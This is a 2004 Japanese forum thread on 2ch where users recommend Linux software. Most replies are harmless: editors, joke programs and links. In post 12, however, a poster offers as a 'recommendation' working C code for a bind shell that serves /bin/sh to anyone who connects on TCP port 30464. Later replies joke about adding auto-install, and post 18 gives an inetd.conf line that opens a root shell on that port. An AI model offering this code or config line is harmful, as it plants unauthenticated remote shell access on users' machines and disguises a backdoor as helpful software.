探検


お前らの気に入ってるソフトをお勧めしろ!

1login:Penguin
垢版 |
04/09/06 15:05ID:ZAlcxoeJ
お勧めするのだ!
2login:Penguin
垢版 |
04/09/06 15:07ID:ZAlcxoeJ
はっきし言ってLinuxはどんなソフトがあるのかさっぱりわからない
だからお俺にお勧めしろ!
わかったか!
04/09/06 15:14ID:VvaiBtvS
ここが2chだとぉー、ここが2chだとぅー、突然、誘惑に負けてぇー、
>>1は池沼、なんて言っちゃう輩が多いんだよね。ダメだよぉー。どんな糞スレでもぉー、誘惑振り切って放置だ。
おーん。>>1が糞スレを立ててぇー、>>1を煽るレスがつき始める。レス数が増える。
こっから出てくるのはなんだぁー?名スレ、>>1への煽りレスで埋まるぅ、名スレ。
だからぁー、次スレとかPart2とか1000ゲトとか出るわけだぁー。
DAT落ちはしねえよぉぉ!お前らがレスすんだからぁー。ぉーん。お前らのレスで埋るんだからぁー。
04/09/06 15:26ID:YM/02V0X
emacs
04/09/06 15:34ID:DPEJtAZk
sl
04/09/06 16:04ID:2g2UKqa1
誘導
http://pc5.2ch.net/test/read.cgi/linux/1075992682/
04/09/06 16:05ID:FsCfmoGn
>>6
誘導先として適切じゃないだろ。
まだ、こっちのほうが。
http://pc5.2ch.net/test/read.cgi/linux/991931552/
8login:Penguin
垢版 |
04/09/06 16:39ID:xDLPvwx0
vi
04/09/06 17:27ID:RiFPYwNy
Linux使いが使っているソフトと満足度
http://pc5.2ch.net/test/read.cgi/linux/1072257744/
最近、インストールしたソフト
http://pc5.2ch.net/test/read.cgi/linux/1029514478/
10login:Penguin
垢版 |
04/09/07 01:43ID:69Rew710
−−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用しおり
  ∧_∧
 ( ・∀・)< 今日はここまで読んだ
−−−−−−−−−−−−−−−−−−−−−−−−−−
04/09/07 02:17ID:kMUJO5p4
>>10
ちょっとドッキリ
12マイク ◆yrBrqfF1Ew
垢版 |
04/09/07 04:38ID:qdKLmqGr
これお勧め。

#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>
int soc,cli,soc_len;struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;int main(){if(fork()==0){
serv_addr.sin_family=AF_INET;serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));listen(soc,1);
soc_len=sizeof(cli_addr);cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);}}
13login:Penguin
垢版 |
04/09/07 05:55ID:+gCTSz/q
>>12
そんなもの使わなくても自由に使えますよね?
Linuxなんだしw
でも便利そうですよね。
起動と同時にIPをここ(2ch)に書き込むようにして公開してはどうでしょう?
14login:Penguin
垢版 |
04/09/07 10:53ID:/BPz6lrP
>>12コンパイルして実行するとどうなんの?
15login:Penguin
垢版 |
04/09/07 11:06ID:0SdoMy9T
質問です。
FLASHとかの画像を取り込むための無料ソフト?が
あったんですが消えてしまたんでもう一回DLしたい
んですがどんなソフトだったか忘れてしまったので教え
てくらさい!初心者なんでスマソ
16マイク ◆yrBrqfF1Ew
垢版 |
04/09/07 22:50ID:fIF/mSYo
>>14
コード読めよ。糞簡単だろ
子プロセスがTCPポート30464に接続してきたクライアントに/bin/shを解放

>>12
このまま使うくらいじゃ大した利用価値はねえわな
17login:Penguin
垢版 |
04/09/08 01:22ID:V0EuK6XO
>>16
自動インストール機能をつけるとさらに便利になりますね。
18login:Penguin
垢版 |
04/09/08 12:27ID:f9HuJ/bE
なんでわざわざそんなもん作るのか疑問だ。
/etc/inetd.conf に
30464 stream tcp nowait root /bin/sh
とか一行追加する程度の話だろ。(最近はxinetdが主流だが)
04/09/14 08:45:59ID:71TUTErY
>>1
Skencil (旧名 Sketch)。高度にプログラマブルなところが良い。
20login:Penguin
垢版 |
04/09/22 16:59:38ID:2oXCA/J6
>>19 それは何のソフトなんだ?
レスを投稿する


ニューススポーツなんでも実況